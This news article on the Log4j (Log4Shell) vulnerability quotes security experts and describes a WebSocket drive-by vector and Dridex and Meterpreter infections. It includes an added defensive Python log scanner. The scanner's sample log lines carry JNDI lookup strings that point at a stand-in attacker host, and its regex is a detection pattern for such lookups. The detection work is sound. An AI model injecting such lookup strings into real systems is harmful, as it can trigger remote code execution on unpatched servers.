Log4j deadly hole expands victims’ vulnerability

Watch out for the Log4j vulnerability! This nasty software bug is freaking out much of the IT world as it follows us into the New Year.

Undoubtedly, many organizations and SMEs without IT staff have no idea it exists. But ignoring Log4j only makes them more vulnerable to attack; they remain helpless.

Log4j is a very common piece of code that helps software applications keep a record of their past activity. Developers build on this shared code rather than reinventing the wheel by writing their own logging or record-keeping programs that would duplicate the same functions.

Earlier this month, cybersecurity experts discovered that if Log4j is asked to log a line containing malicious code, it executes that code in the process. This allows bad actors to gain control of the servers running Log4j.

This revelation put almost every major software company in crisis mode. They examined their products to see whether the Log4j vulnerability affected them and, if so, how they could close the gap.

This vulnerability is a huge deal. Log4j has been around for almost a decade, noted Theresa Payton, former White House chief information officer and CEO of cybersecurity consulting firm Fortalice Solutions.

“Think of it as your library of everything that can be saved. We tell organizations [to] record everything [as] you may need it later for forensics. Log4J is therefore often used by Java developers when they want to record that a person has logged in and can even use it to track access to applications,” Payton told TechNewsWorld.

Many companies may not even know if they have used Log4j, making it even more difficult to know the extent of the problem. In order for them to find out, they would need a software engineer to browse the different systems to research usage and then look at the versions, she added.

“It can take a long time,” Payton noted, “and time is something you don’t have when you’re racing against time against bad actors looking to exploit these vulnerabilities.”

Backdoor for hackers

Think of a door lock used in a variety of security hardware installations in millions of places around the world. Some door locks have the same partial failure in a small pinion that allows almost any key to open the lock.

Changing your own lock is an easy fix if you are aware of the potential failure and have the tools to do the replacement job. To do this all over the world is an insurmountable task. This concept is what makes the Log4j debacle so threatening.

Log4j has been part of the Java ecosystem, which has been used to write software since the mid-1990s. Software running Log4j code drives business and consumer applications everywhere.

Cloud storage companies that provide the digital backbone for millions of other applications are also affected. Major vendors of software programs used in millions of devices are also involved.

Typically, when a security vulnerability is detected, the Chief Information Security Officer (CISO) leads the charge of updating and patching systems or implementing manual mitigation measures, explained Payton. Log4j is more insidious and hidden, and is not entirely under the CISO’s control.

“Hunting and finding this vulnerability requires everyone who is a programmer. Where is development happening nowadays? Everywhere! Developers can be internal staff, outsourced development, offshore development, and third-party vendors,” she observed.

All of this represents an inexhaustible attack opportunity for hackers. Of course, not everyone will be hacked, at least not immediately. The big question is whether your systems are laced with the problematic code. Just finding out puts IT departments and software engineers into overload.

“The implications of exploiting this vulnerability are the subject of my nightmares. An unethical hacker with knowledge and access could use this vulnerability and target servers using this logging capability with remote code execution on the servers,” Payton warned.

Expansion of attack vectors

Hackers are now fully aware of the Log4j vulnerability. Cybersecurity threat hunters see many instances of bad actors expanding what they can do with their attacks.

The Blumira research team recently discovered an alternative attack vector for the Log4j vulnerability that relies on a basic JavaScript WebSocket connection to trigger the remote code execution (RCE) vulnerability locally via a drive-by compromise. This discovery makes the vulnerability worse.

One of the first assumptions made by cybersecurity experts was that Log4j’s impact was limited to vulnerable servers exposed to the internet. This recently discovered attack vector means that anyone with a vulnerable version of Log4j can be exploited through a listening server on their machine or local network simply by browsing a website that triggers the vulnerability.

WebSockets have been used in the past to scan ports on internal systems, but this represents one of the first remote code execution exploits relayed via WebSockets, said Jake Williams, co-founder and CTO of incident response company BreachQuest.

“That shouldn’t change anyone’s stance on vulnerability management, however. Organizations should strive to patch quickly and mitigate by preventing outbound connections from potentially vulnerable services where patching is not an option,” he told TechNewsWorld.

While important, attackers are likely to favor the remote exploit over the local one, added John Bambenek, senior threat hunter at Netenrich, an IT operations and digital security company. That said, this news means that relying on a WAF or other network defenses is no longer an effective mitigation.

“The fix remains the most important step an organization can take,” he told TechNewsWorld.

Log4Shell vulnerability

The Log4j vulnerability, dubbed Log4Shell, already provides a relatively easy exploitation path for threat actors, the Blumira report noted. It does not require authentication to take full control of web servers.

Using this vulnerability, attackers can call external Java libraries via ${jndi:ldap:// and ${jndi:ldaps:// lookups and drop shells to deploy the RCE attack without additional effort. This new attack vector extends Log4j’s attack surface even further and can affect services running only on localhost that have never been exposed to any network, according to Blumira.
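As an added illustration from the defender’s side (example code written for this page, not from Blumira, TechNewsWorld or the Log4j project), the following Python scans sample web-server log lines for the literal lookup strings just described and lists the external servers each lookup would have contacted, which is exactly the outbound traffic that the egress filtering recommended above is meant to block. The Apache-style access-log format, the documentation-range addresses, and the inclusion of rmi and dns alongside the ldap/ldaps schemes named in the article are assumptions of this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# A JNDI lookup as it appears inside a logged message:
#   ${jndi:<scheme>://<host>[:port]<path>}
# The article names ldap and ldaps; rmi and dns are added here as an
# assumption, since they are other JNDI providers a lookup could name.
# Matching is case-insensitive and tolerates whitespace inside the braces.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns)\s*:\s*//\s*"
    r"(?P<host>[^\s/:}]+)(?::(?P<port>\d+))?(?P<path>[^}]*)\}",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    line_no: int          # 1-based index of the log line
    scheme: str           # normalized to lower case
    host: str             # server the lookup would have connected to
    port: Optional[int]   # None when the lookup gives no explicit port
    raw: str              # the exact lookup string as logged


def scan_lines(lines: List[str]) -> List[Finding]:
    """Return every literal JNDI lookup found in the given log lines.

    Caveat: a literal pattern only catches straightforward lookups. Nested or
    encoded variants must be decoded first, so a clean result is a triage
    signal, not proof that the service was never probed; patching remains
    the real fix.
    """
    findings: List[Finding] = []
    for n, line in enumerate(lines, start=1):
        for m in JNDI_RE.finditer(line):
            port = m.group("port")
            findings.append(
                Finding(
                    line_no=n,
                    scheme=m.group("scheme").lower(),
                    host=m.group("host"),
                    port=int(port) if port else None,
                    raw=m.group(0),
                )
            )
    return findings


def egress_targets(findings: List[Finding]) -> List[Tuple[str, str, Optional[int]]]:
    """Distinct (scheme, host, port) endpoints the lookups would have reached.

    These are the outbound connections an egress filter should already block
    for unpatched services, and they are worth checking against firewall or
    proxy logs to see whether a lookup actually completed.
    """
    targets = {(f.scheme, f.host, f.port) for f in findings}
    return sorted(targets, key=lambda t: (t[0], t[1], t[2] or 0))


# Constructed sample: Apache-style access log lines with the lookup carried in
# the User-Agent field, which many affected applications logged verbatim.
# Addresses and hostnames are documentation/example values, not real indicators.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 404 0 "-" "${ JNDI : LDAPS ://attacker.example/x }"',
    '198.51.100.7 - - [10/Dec/2021:12:00:04 +0000] "GET /home HTTP/1.1" 200 300 "-" "${env:HOME}"',
]

if __name__ == "__main__":
    hits = scan_lines(SAMPLE_LOG)
    for f in hits:
        print(f"line {f.line_no}: {f.scheme}://{f.host}:{f.port or '-'}  <- {f.raw}")
    print("egress targets:", egress_targets(hits))
```

Run against real access, application or proxy logs, the scan gives an incident responder two things at once: which requests carried a lookup, and which external hosts an unpatched instance would have reached out to, so the second list can be checked against outbound connection logs to distinguish a blocked probe from a completed one.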

“When the Log4j vulnerability was released, it quickly became apparent that it could potentially become a bigger issue. This attack vector opens up a variety of potential malicious use cases, ranging from malvertising to creating watering holes for drive-by attacks,” said Matthew Warner, CTO and co-founder of Blumira.

“Bringing this information to light ensures that organizations have the ability to act quickly and protect themselves against malicious threats,” he added.

Log4j linked to Dridex, Meterpreter

An offshoot of the Log4j Log4Shell vulnerability is another infection path that researchers recently discovered, which installs the notorious Dridex banking trojan or Meterpreter on vulnerable devices, according to a report from Bleeping Computer.

The Dridex malware is a banking Trojan originally developed to steal online banking credentials. It has since become a loader that downloads various modules to perform tasks such as installing additional payloads, spreading to other devices, and taking screenshots.

Dridex is primarily used to run Windows commands; if it lands on a non-Windows machine, it instead downloads and runs a Python script for Linux/Unix to install Meterpreter.

Meterpreter, a Metasploit attack payload, is deployed via in-memory DLL injection: it resides entirely in memory and writes nothing to disk. It provides an interactive shell that an attacker uses to explore the target machine and execute code.

Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency, said in recent media appearances that the Log4j vulnerability is the most severe she has seen in her decades-long career. Cybersecurity experts warn that the Log4j vulnerability is the biggest software flaw ever in terms of the number of services, sites and devices exposed.
